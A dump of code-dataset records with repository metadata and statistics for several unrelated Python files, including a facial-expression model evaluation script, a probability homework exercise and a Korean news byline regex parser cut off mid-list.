| 11.5 | 22 | 0.73913 | 3 | 23 | 5.666667 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.894737 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
94dcf6d3732086370dcaa16da2f8c9e2fd340335 | 37 | py | Python | ml/vision/models/pose/hrnet/__init__.py | necla-ml/ML-Vision | 66229b29fc0f67c75dbe6304cdb8c5e93fe0bacf | [
"BSD-3-Clause"
] | 1 | 2021-08-04T12:33:25.000Z | 2021-08-04T12:33:25.000Z | ml/vision/models/pose/hrnet/__init__.py | necla-ml/ML-Vision | 66229b29fc0f67c75dbe6304cdb8c5e93fe0bacf | [
"BSD-3-Clause"
] | 1 | 2021-11-02T21:29:44.000Z | 2021-12-02T15:49:17.000Z | ml/vision/models/pose/hrnet/__init__.py | necla-ml/ML-Vision | 66229b29fc0f67c75dbe6304cdb8c5e93fe0bacf | [
"BSD-3-Clause"
] | null | null | null | from .model import posenet, inference | 37 | 37 | 0.837838 | 5 | 37 | 6.2 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.108108 | 37 | 1 | 37 | 37 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
94f05f8db6aa1bd605ba3d419f397dc2be6bbb1b | 132 | py | Python | tests/python/math_fun/lib/test_version.py | jaximan/pexample | 8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1 | [
"Apache-2.0"
] | 17 | 2017-12-28T18:05:53.000Z | 2022-03-07T09:45:40.000Z | tests/python/math_fun/lib/test_version.py | jaximan/pexample | 8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1 | [
"Apache-2.0"
] | null | null | null | tests/python/math_fun/lib/test_version.py | jaximan/pexample | 8820e82b01b4ef84746351ddf2e1c8af1ff6b0a1 | [
"Apache-2.0"
] | 2 | 2017-12-28T17:14:17.000Z | 2020-03-25T17:46:37.000Z | from math_fun.lib.version import describe
def test_describe():
assert "Numpy" in describe()
assert "Python" in describe()
| 18.857143 | 41 | 0.719697 | 18 | 132 | 5.166667 | 0.722222 | 0.301075 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.181818 | 132 | 6 | 42 | 22 | 0.861111 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0.5 | 1 | 0.25 | true | 0 | 0.25 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
a20cf4dad473739eb3aa54123c923a1af0ba8ff6 | 3,775 | py | Python | Metodos Computacionales Uniandes/Code/ejercicio_07.py | aess14/Cursos-Uniandes | be016b25f2f49788235fbe91ec577fd16b9ad613 | [
"MIT"
] | null | null | null | Metodos Computacionales Uniandes/Code/ejercicio_07.py | aess14/Cursos-Uniandes | be016b25f2f49788235fbe91ec577fd16b9ad613 | [
"MIT"
] | null | null | null | Metodos Computacionales Uniandes/Code/ejercicio_07.py | aess14/Cursos-Uniandes | be016b25f2f49788235fbe91ec577fd16b9ad613 | [
"MIT"
] | null | null | null |
# Un grupo de m gatos y n perros se encuentran alieados en un orden aleatorio.
# Es decir, cualquiera de las 50! permutaciones es igual de probable.
#Escriba un programa de python que genere una lista que representa a
#los 50 perros y gatos, y la reordene aleatoriamente usando
#np.random.shuffle() para calcular las siguientes probabilidades:
#¿Cual es la probabilidad de que un perro se encuentre en la primera
#posición?
#¿Cuál es la probabilidad de que un gato se encuentre en la primera
#posición?
#¿Cuál es la probabilidad de que un perro y un gato se encuentren al
#tiempo en la primera y última posición, respectivamente?
# El programa debe estar en un archivo llamado
# "ApellidoNombre_MagistralEjercicio07.py" donde Apellido y Nombre
# debe reemplazarlos con su apellido y nombre. Suba ese archivo como
# respuesta a esta actividad.
#
# Al ejecutar "python ApellidoNombre_MagistralEjercicio07.py" no se
# debe producir ningún error y solamente debe imprimir las tres
# probabilidades con dos cifras decimales.
# Se considera que el programa no corre si se demora más de un minuto
# en producir la respuesta.
# Al correr tres veces el programa la respuesta debe ser la misma.
# Solamente puede utilizar las funciones y métodos vistas en clase
# (videos o clases sincrónicas, o que ya se encuentren en el repositorio)
# Un grupo de m gatos y n perros se encuentran alieados en un orden aleatorio.
# Es decir, cualquiera de las 50! permutaciones es igual de probable.
#Escriba un programa de python que genere una lista que representa a
#los 50 perros y gatos, y la reordene aleatoriamente usando
#np.random.shuffle() para calcular las siguientes probabilidades:
#¿Cual es la probabilidad de que un perro se encuentre en la primera
#posición?
#¿Cuál es la probabilidad de que un gato se encuentre en la primera
#posición?
#¿Cuál es la probabilidad de que un perro y un gato se encuentren al
#tiempo en la primera y última posición, respectivamente?
# El programa debe estar en un archivo llamado
# "ApellidoNombre_MagistralEjercicio07.py" donde Apellido y Nombre
# debe reemplazarlos con su apellido y nombre. Suba ese archivo como
# respuesta a esta actividad.
#
# Al ejecutar "python ApellidoNombre_MagistralEjercicio07.py" no se
# debe producir ningún error y solamente debe imprimir las tres
# probabilidades con dos cifras decimales.
# Se considera que el programa no corre si se demora más de un minuto
# en producir la respuesta.
# Al correr tres veces el programa la respuesta debe ser la misma.
# Solamente puede utilizar las funciones y métodos vistas en clase
# (videos o clases sincrónicas, o que ya se encuentren en el repositorio) .
import numpy as np
def gatos_y_perros(m, n):
n_gatos = m
n_perros = n
gato = 0
perro = 1
animales = n_gatos*[gato] + n_perros*[perro]# 0 es para gatos, 1 para perros.
N = 1000
perro_en_primera = 0
gato_en_primera = 0
perro_en_primera_gato_en_ultima = 0
for i in range(N):
np.random.shuffle(animales)
if animales[0]==perro: # perro en primera posicion
perro_en_primera += 1
if animales[0]==gato: # gato en primera posicion
gato_en_primera += 1
if animales[0]==perro and animales[-1]==gato: # perro en primera, gato en ultima
perro_en_primera_gato_en_ultima += 1
a = (perro_en_primera/N)
b = (gato_en_primera/N)
c = (perro_en_primera_gato_en_ultima/N)
return a, b, c
#a = []
#b = []
#c = []
#for i in range(10):
# x = gatos_y_perros(1000,15000)
# a.append(x[0])
# b.append(x[1])
# c.append(x[2])
#print(np.mean(a), np.std(a))
#print(np.mean(b), np.std(b))
#print(np.mean(c), np.std(c))
| 33.114035 | 88 | 0.720265 | 602 | 3,775 | 4.461794 | 0.227575 | 0.040208 | 0.041698 | 0.040208 | 0.837677 | 0.837677 | 0.783321 | 0.783321 | 0.783321 | 0.783321 | 0 | 0.016145 | 0.21245 | 3,775 | 113 | 89 | 33.40708 | 0.885301 | 0.768742 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00885 | 0 | 1 | 0.043478 | false | 0 | 0.043478 | 0 | 0.130435 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
bf96c8366fecce5ee1675084caf26fe3d86fdfa2 | 123 | py | Python | exceptions.py | cr0mbly/TTGO-esp32-micropython-watch | 3378ea3b15e19f6bab405b6fc07759f17dd6213d | [
"MIT"
] | 6 | 2020-09-10T20:04:49.000Z | 2021-10-10T06:26:05.000Z | exceptions.py | cr0mbly/TTGO-esp32-micropython-watch | 3378ea3b15e19f6bab405b6fc07759f17dd6213d | [
"MIT"
] | null | null | null | exceptions.py | cr0mbly/TTGO-esp32-micropython-watch | 3378ea3b15e19f6bab405b6fc07759f17dd6213d | [
"MIT"
] | null | null | null | class FailedCurrentTimeRequestException(Exception):
pass
class FailedToConnectToNetworkException(Exception):
pass | 20.5 | 51 | 0.829268 | 8 | 123 | 12.75 | 0.625 | 0.254902 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.121951 | 123 | 6 | 52 | 20.5 | 0.944444 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
bf9bf5bcf74e867be9b087003fbed351097c250f | 135 | py | Python | app/rest/person.py | debuglevel/greeting-microservice-python | 58ab2546eca4bee8099cb208c1a4291ef857c2a0 | [
"Unlicense"
] | 1 | 2022-03-24T20:28:43.000Z | 2022-03-24T20:28:43.000Z | app/rest/person.py | debuglevel/greeting-microservice-python | 58ab2546eca4bee8099cb208c1a4291ef857c2a0 | [
"Unlicense"
] | null | null | null | app/rest/person.py | debuglevel/greeting-microservice-python | 58ab2546eca4bee8099cb208c1a4291ef857c2a0 | [
"Unlicense"
] | null | null | null | from pydantic import BaseModel
class PersonIn(BaseModel):
name: str
class PersonOut(BaseModel):
name: str
created_on: str | 16.875 | 30 | 0.733333 | 17 | 135 | 5.764706 | 0.647059 | 0.265306 | 0.326531 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.2 | 135 | 8 | 31 | 16.875 | 0.907407 | 0 | 0 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.166667 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
44a04a18e1305dd0922632952a64c27aa0cbc3b9 | 45 | py | Python | tests/scripts/main/__init__.py | Siaan/COMS4995 | a1dffcd83698ab3832a79f7a9632cd34ce1448d7 | [
"Apache-2.0"
] | null | null | null | tests/scripts/main/__init__.py | Siaan/COMS4995 | a1dffcd83698ab3832a79f7a9632cd34ce1448d7 | [
"Apache-2.0"
] | 13 | 2020-10-02T04:56:13.000Z | 2020-12-21T07:15:04.000Z | tests/scripts/main/__init__.py | Siaan/COMS4995 | a1dffcd83698ab3832a79f7a9632cd34ce1448d7 | [
"Apache-2.0"
] | 1 | 2020-12-21T23:46:05.000Z | 2020-12-21T23:46:05.000Z | from clean_KF import visualise # noqa: F401
| 22.5 | 44 | 0.777778 | 7 | 45 | 4.857143 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.081081 | 0.177778 | 45 | 1 | 45 | 45 | 0.837838 | 0.222222 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
44c17f2d2c1369cdc280def9395462360ad3734b | 23 | py | Python | tests/rzyprior/__init__.py | plewis/phycas | 9f5a4d9b2342dab907d14a46eb91f92ad80a5605 | [
"MIT"
] | 3 | 2015-09-24T23:12:57.000Z | 2021-04-12T07:07:01.000Z | tests/rzyprior/__init__.py | plewis/phycas | 9f5a4d9b2342dab907d14a46eb91f92ad80a5605 | [
"MIT"
] | null | null | null | tests/rzyprior/__init__.py | plewis/phycas | 9f5a4d9b2342dab907d14a46eb91f92ad80a5605 | [
"MIT"
] | 1 | 2015-11-23T10:35:43.000Z | 2015-11-23T10:35:43.000Z | from rzyprior import *
| 11.5 | 22 | 0.782609 | 3 | 23 | 6 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173913 | 23 | 1 | 23 | 23 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
44c41539184463a4115beb061c5c97838881f819 | 206 | py | Python | limesurveyrc2api/__init__.py | spesantez/limeapy | ca21449f2dec451f1d4d704c7c630a25b3a47e44 | [
"MIT"
] | null | null | null | limesurveyrc2api/__init__.py | spesantez/limeapy | ca21449f2dec451f1d4d704c7c630a25b3a47e44 | [
"MIT"
] | null | null | null | limesurveyrc2api/__init__.py | spesantez/limeapy | ca21449f2dec451f1d4d704c7c630a25b3a47e44 | [
"MIT"
] | null | null | null | from .limesurveyrc2api import LimeSurveyRemoteControl2API
# Lifts the class into the package namespace instead of package.module
# Otherwise you'd need from limesurveyrc2api.limesurveyrc2api import Lime...
| 51.5 | 76 | 0.84466 | 24 | 206 | 7.25 | 0.75 | 0.229885 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021858 | 0.11165 | 206 | 3 | 77 | 68.666667 | 0.928962 | 0.694175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
44c8e51ae1da4757a570df0078715fcb26bc5f70 | 477 | py | Python | test/model/save_profile.py | jack09581013/Dual-GDNet | d9d65928208caee781cbe8f8f794241d06b4bf5d | [
"MIT"
] | null | null | null | test/model/save_profile.py | jack09581013/Dual-GDNet | d9d65928208caee781cbe8f8f794241d06b4bf5d | [
"MIT"
] | null | null | null | test/model/save_profile.py | jack09581013/Dual-GDNet | d9d65928208caee781cbe8f8f794241d06b4bf5d | [
"MIT"
] | null | null | null | import profile
import CSPN.cspn as cspn
import GANet.GANet_small_deep as ganet_small_deep
import GANet.GANet_small as ganet_small
import GANet.GANet_deep as ganet_deep
class GANet_small_deep_fine_tune(profile.Profile):
def get_model(self, max_disparity):
return ganet_small_deep.GANet_small_deep(max_disparity)
def version_file_path(self):
return f'../../model/save/GANet_small_deep_fine_tune'
def __str__(self):
return 'GANet_small_deep' | 31.8 | 63 | 0.781971 | 74 | 477 | 4.621622 | 0.310811 | 0.263158 | 0.28655 | 0.122807 | 0.128655 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148847 | 477 | 15 | 64 | 31.8 | 0.842365 | 0 | 0 | 0 | 0 | 0 | 0.123431 | 0.089958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.416667 | 0.25 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
44c9225bbac2686002e7751734a08a9ee80a1949 | 9,620 | py | Python | training/eval2.py | manogna-s/da-fer | 43229ba368454cb4e5aecab8fdb3ea68ad9060e4 | [
"MIT"
] | null | null | null | training/eval2.py | manogna-s/da-fer | 43229ba368454cb4e5aecab8fdb3ea68ad9060e4 | [
"MIT"
] | null | null | null | training/eval2.py | manogna-s/da-fer | 43229ba368454cb4e5aecab8fdb3ea68ad9060e4 | [
"MIT"
] | null | null | null | from models.ResNet_feat import ResClassifier
from utils.Utils import *
from train_setup import *
from models.ResNet_stoch_feat import IR_global_local_stoch_feat, IR_onlyResNet50_stoch
from models.ResNet_stoch_feat import *
from torch.distributions.multivariate_normal import MultivariateNormal
# label2exp = {0:'Surprised', 1:'Fear', 2:'Disgust', 3:'Happy', 4:'Sad', 5:'Anger', 6:'Neutral'}
label2exp = {0:'Happy', 1:'Neutral'}
n_samples = 5
sigma_avg = 5
threshold = np.log(sigma_avg) + (1 + np.log(2 * np.pi)) / 2
def test_MCD(args, splits=None):
if splits is None: # evaluate on test splits by default
splits = ['test_source', 'test_target']
args.train_batch = 1
args.test_batch = 1
# Build Dataloader
print("Building Train and Test Dataloader...")
dataloaders = {'train_source': BuildDataloader(args, split='train', domain='source', max_samples=args.source_labeled),
'train_target': BuildDataloader(args, split='train', domain='target', max_samples=args.target_unlabeled),
'test_source': BuildDataloader(args, split='test', domain='source'),
'test_target': BuildDataloader(args, split='test', domain='target')}
print('Done!')
if args.use_mcd:
G = IR_global_local_feat(50)
# print(G)
G_ckpt = torch.load(os.path.join(args.out,'ckpts', 'MCD_G_26.pkl'))
G.load_state_dict(G_ckpt)
F1 = ResClassifier(num_classes=args.class_num, num_layer=1)
F1_ckpt = torch.load(os.path.join(args.out,'ckpts', 'MCD_F2_26.pkl'))
F1.load_state_dict(F1_ckpt)
G.cuda()
F1.cuda()
G.eval()
F1.eval()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
Features = []
Labels = []
results = []
for split in splits:
out_img_dir=os.path.join(args.out, f'out_imgs_{split}')
wrong_imgs=os.path.join(args.out, f'misclassified_imgs_{split}')
os.makedirs(out_img_dir, exist_ok=True)
for exp in label2exp.values():
os.makedirs(os.path.join(out_img_dir, exp), exist_ok=True)
os.makedirs(os.path.join(wrong_imgs, exp), exist_ok=True)
print(f'\n[{split}]')
iter_dataloader = iter(dataloaders[split])
acc, prec, recall = [AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)]
for batch_index, (input, landmark, label, img_name) in enumerate(iter_dataloader):
input, landmark, label = input.cuda(), landmark.cuda(), label
with torch.no_grad():
feature = G(input, landmark)
output = F1(feature)
probs= (F.softmax(output).cpu().data.numpy()*100).astype(int)
max_prob = np.max(probs)
pred_class = np.argmax(probs)
pred= {'split':split, 'img':img_name[0], 'label':label2exp[label.cpu().data.numpy()[0]], 'pred':label2exp[pred_class]}
results.append(pred)
if False:# True:
img = input[0].cpu().data.numpy()
img = np.einsum('kij->ijk',img)
img = img * std + mean
img = np.clip(img, 0, 1) *255
img = img.astype(np.uint8)
out= f'prob:{max_prob} \n label: {label2exp[label.cpu().data.numpy()[0]]} pred:{label2exp[pred_class]}'
plt.imshow(img)
plt.title(out)
plt.savefig(os.path.join(out_img_dir,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
print(pred)
print('\n\n')
Compute_Accuracy(args, output, label, acc, prec, recall)
Features.append(feature.cpu().data.numpy())
Label = label.cpu().data.numpy()
if Label[0]!=pred_class:
plt.savefig(os.path.join(wrong_imgs,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
if split == 'test_target':
Label+=7
elif split == 'train_source':
Label+=14
Labels.append(Label)
AccuracyInfo, acc_avg, prec_avg, recall_avg, f1_avg = Show_Accuracy(acc, prec, recall, args.class_num)
df = pd.DataFrame.from_dict(results)
df.to_csv(os.path.join(out_img_dir,'results.csv'), index=False, header=True)
return
def test_stoch_MCD(args, splits=None):
if splits is None: # evaluate on test splits by default
splits = ['test_source', 'test_target']
args.train_batch = 1
args.test_batch = 1
# Build Dataloader
print("Building Train and Test Dataloader...")
dataloaders = {'train_source': BuildDataloader(args, split='train', domain='source', max_samples=args.source_labeled),
'train_target': BuildDataloader(args, split='train', domain='target', max_samples=args.target_unlabeled),
'test_source': BuildDataloader(args, split='test', domain='source'),
'test_target': BuildDataloader(args, split='test', domain='target')}
print('Done!')
G = IR_global_local_stoch_feat(50,feature_dim=384)
print(G)
G_ckpt = torch.load(os.path.join(args.out,'ckpts', 'Stoch_MCD_G.pkl'))
G.load_state_dict(G_ckpt)
G.cuda()
F1 = Stochastic_Features_cls(args, input_dim=G.output_num())
F1_ckpt = torch.load(os.path.join(args.out,'ckpts', 'Stoch_MCD_F2.pkl'))
F1.load_state_dict(F1_ckpt)
F1.cuda()
G.eval()
F1.eval()
mean=[0.485, 0.456, 0.406]
std=[0.229, 0.224, 0.225]
Features = []
Labels = []
results = []
for split in splits:
out_img_dir=os.path.join(args.out, f'out_imgs_{split}')
wrong_imgs=os.path.join(args.out, f'misclassified_imgs_{split}')
os.makedirs(out_img_dir, exist_ok=True)
for exp in label2exp.values():
os.makedirs(os.path.join(out_img_dir, exp), exist_ok=True)
os.makedirs(os.path.join(wrong_imgs, exp), exist_ok=True)
print(f'\n[{split}]')
iter_dataloader = iter(dataloaders[split])
acc, prec, recall = [AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)], \
[AverageMeter() for i in range(args.class_num)]
for batch_index, (input, landmark, label) in enumerate(iter_dataloader):
input, landmark, label = input.cuda(), landmark.cuda(), label
with torch.no_grad():
feature, sigma = G(input, landmark)
output = F1(feature)
probs= (F.softmax(output).cpu().data.numpy()*100).astype(int)
max_prob = np.max(probs)
pred_class = np.argmax(probs)
mvn = MultivariateNormal(feature, scale_tril=torch.diag_embed(sigma))
loss_fu = torch.mean(nn.ReLU()(threshold - mvn.entropy()/G.output_num()))
entropy = mvn.entropy().cpu().data.numpy()[0]/G.output_num()
pred_entropy = 0
for i in range(n_samples):
feat = mvn.rsample()
output_sample = F1(feat)
probs_samples= F.softmax(output_sample)
pred_entropy += -torch.sum(probs_samples * torch.log(probs_samples))
print((probs_samples.cpu().data.numpy()*100).astype(int))
pred_entropy/=n_samples
pred= {'split':split, 'img':batch_index, 'label':label2exp[label.cpu().data.numpy()[0]], 'pred':label2exp[pred_class],
'entropy': f'{entropy:.3f}', 'prob': f'{max_prob}', 'pred entropy': f'{pred_entropy:5f}'}
results.append(pred)
if True:
img = input[0].cpu().data.numpy()
img = np.einsum('kij->ijk',img)
img = img * std + mean
img = np.clip(img, 0, 1) *255
img = img.astype(np.uint8)
out= f'feat_ent: {entropy:.3f} pred_ent: {pred_entropy:.3f} prob:{max_prob} \n label: {label2exp[label.cpu().data.numpy()[0]]} pred:{label2exp[pred_class]}'
plt.imshow(img)
plt.title(out)
plt.savefig(os.path.join(out_img_dir,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
print(pred, entropy, pred_entropy)
print('\n\n')
Compute_Accuracy(args, output, label, acc, prec, recall)
Features.append(feature.cpu().data.numpy())
Label = label.cpu().data.numpy()
if Label[0]!=pred_class:
plt.savefig(os.path.join(wrong_imgs,label2exp[label.cpu().data.numpy()[0]], f'{split}_{batch_index}.png'))
if split == 'test_target':
Label+=7
elif split == 'train_source':
Label+=14
Labels.append(Label)
AccuracyInfo, acc_avg, prec_avg, recall_avg, f1_avg = Show_Accuracy(acc, prec, recall, args.class_num)
df = pd.DataFrame.from_dict(results)
df.to_csv(os.path.join(out_img_dir,'results.csv'), index=False, header=True)
return
def main():
if args.use_mcd:
test_MCD(args, splits = ['train_target'])
if args.use_stoch_feats:
test_stoch_MCD(args, splits = ['test_target'])
return
if __name__ == '__main__':
main() | 39.265306 | 177 | 0.57921 | 1,236 | 9,620 | 4.330097 | 0.157767 | 0.020179 | 0.033632 | 0.031764 | 0.795404 | 0.78139 | 0.765321 | 0.748132 | 0.748132 | 0.748132 | 0 | 0.023165 | 0.277547 | 9,620 | 245 | 178 | 39.265306 | 0.746906 | 0.022141 | 0 | 0.716667 | 0 | 0.011111 | 0.113085 | 0.030638 | 0 | 0 | 0 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.033333 | 0 | 0.066667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
7880cbcc3ecfe5a378a706dbe1133d89ed035537 | 32,924 | py | Python | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | 1 | 2022-02-25T02:35:09.000Z | 2022-02-25T02:35:09.000Z | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | nt-worker/newGetByline/byLineParserSelector.py | KPFBERT/Newstrust | db1ca6454ce9f421f9c4006f8cd00bade06b17b5 | [
"MIT"
] | null | null | null | from .byLineClass import MainBylineParser
# init
def getByLineParser(target: str):
target = target.lower()
# def __init__(self,boardPattenAdd:list,selfPatten:list,includeText:list):
boardPattern = []
selfPattern = []
includeText = []
if "kbs" in target:
selfPattern = ["KBS\\s?뉴스\\s?([가-힣]{2,4})\\s?입니다?",
"뉴스[,\\s]*([가-힣]{2,4})입니다",
"([가-힣]{2,4}) 기잡니다.",
"제작:([가-힣]{2,4})",
"업그레이드[,\\s]*([가-힣]{2,4})입니다.",
"톡톡 ([가-힣]{2,4})입니다."]
includeText = ["SBS 뉴미디어부"]
return MainBylineParser(boardPattern, selfPattern, includeText)
elif "ytn" in target:
selfPattern = ["([가-힣]{2,4})\\s?\\[email",
"YTN ([가-힣]{2,4})입니다.",
"([가-힣]{2,4})\\s?PD\\s?\\[email",
"([가-힣]{2,4})\\s?기자\\s?\\[email",
"뉴스가 있는 저녁 ([가-힣]{2,4})입니다.",
"영상 편집 : ([가-힣]{2,4})",
"YTN Star ([가-힣]{2,4}) 기자",
"구성 ([가-힣]{2,4})",
"취재기자: ([가-힣]{2,4})",
"YTN PLUS ([가-힣]{2,4}) 기자",
"([가-힣]{2,4})\\s?\\(email",
"([가-힣]{2,4})\\s?PD\\s?\\(email",
"([가-힣]{2,4})\\s?기자\\s?\\(email",
"낚시채널 FTV\\s?\\(([가-힣]{2,4})\\)",
"VJ ([가-힣]{2,4})"
"vj ([가-힣]{2,4})"
]
boardPattern = ["의 앵커", "앵커", "-VJ", "-구성"]
includeText = ["에이앤뉴스"]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "mbc" in target:
selfPattern = ["뉴스\\s?([가-힣]{2,4})\\s?입니다.",
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "obs" in target:
selfPattern = [
"([가-힣]{2,4})\\s?\\(email",
# 김정수(webmaster@obs.co.kr)
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "sbs" in target:
boardPattern = ["국방전문기자"]
includeText = ["SBS 뉴미디어부"]
selfPattern = ["KBC\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4}) SBS 기자"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "헤럴드경제" in target:
includeText = ["아트데이"]
boardPattern = ["건설부동산부"]
selfPattern = [
"헤럴드경제\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4})\\s?기자"
]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한라일보" in target:
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한국일보" in target:
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한국경제" in target:
includeText = []
selfPattern = [
"([가-힣]{2,4})\\s?한경닷컴\\s?기자",
"([가-힣]{2,4})\\s?한경닷컴\\s?객원",
"([가-힣]{2,4})\\s?한경닷컴\\s?연예",
"한경닷컴\\s?([가-힣]{2,4})\\s?기자",
"([가-힣]{2,4})\\s?기자\\s?email",
"([가-힣]{2,4}) 뉴스룸 email"
]
boardPattern = ["한국경제신문", "논설위원", "웰스에듀", "여행레저전문기자"]
return MainBylineParser(boardPattern, selfPattern, includeText, emailStr=True)
elif "한겨레" in target:
boardPattern = ["한국경제신문", "논설위원", "ㅣ논설위원", "객원기자", "선임기자"
, "책지성팀장", "ㅣ젠더데스크 ", " ㅣ 디지털콘텐츠부", "ㅣ베이징 특파원", "사람과디지털연구소장"
